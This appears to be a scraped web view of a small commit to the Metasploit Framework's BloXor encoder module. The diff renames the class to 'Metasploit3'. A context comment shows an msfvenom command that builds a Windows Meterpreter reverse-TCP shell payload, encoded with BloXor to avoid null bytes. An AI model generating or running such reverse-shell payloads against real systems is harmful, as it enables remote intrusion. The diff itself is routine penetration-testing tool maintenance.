parent
aa5b201427
commit
0e46cc0259
|
@ -24,7 +24,7 @@ require 'rex/encoder/bloxor/bloxor'
|
||||||
# >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 -
|
# >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 -
|
||||||
#
|
#
|
||||||
|
|
||||||
class Metasploit < Rex::Encoder::BloXor
|
class Metasploit3 < Rex::Encoder::BloXor
|
||||||
|
|
||||||
# Note: Currently set to manual, bump it up to automatically get selected by the framework.
|
# Note: Currently set to manual, bump it up to automatically get selected by the framework.
|
||||||
# Note: BloXor by design is slow due to its exhaustive search for a solution.
|
# Note: BloXor by design is slow due to its exhaustive search for a solution.
|
||||||
|
|
Loading…
Reference in New Issue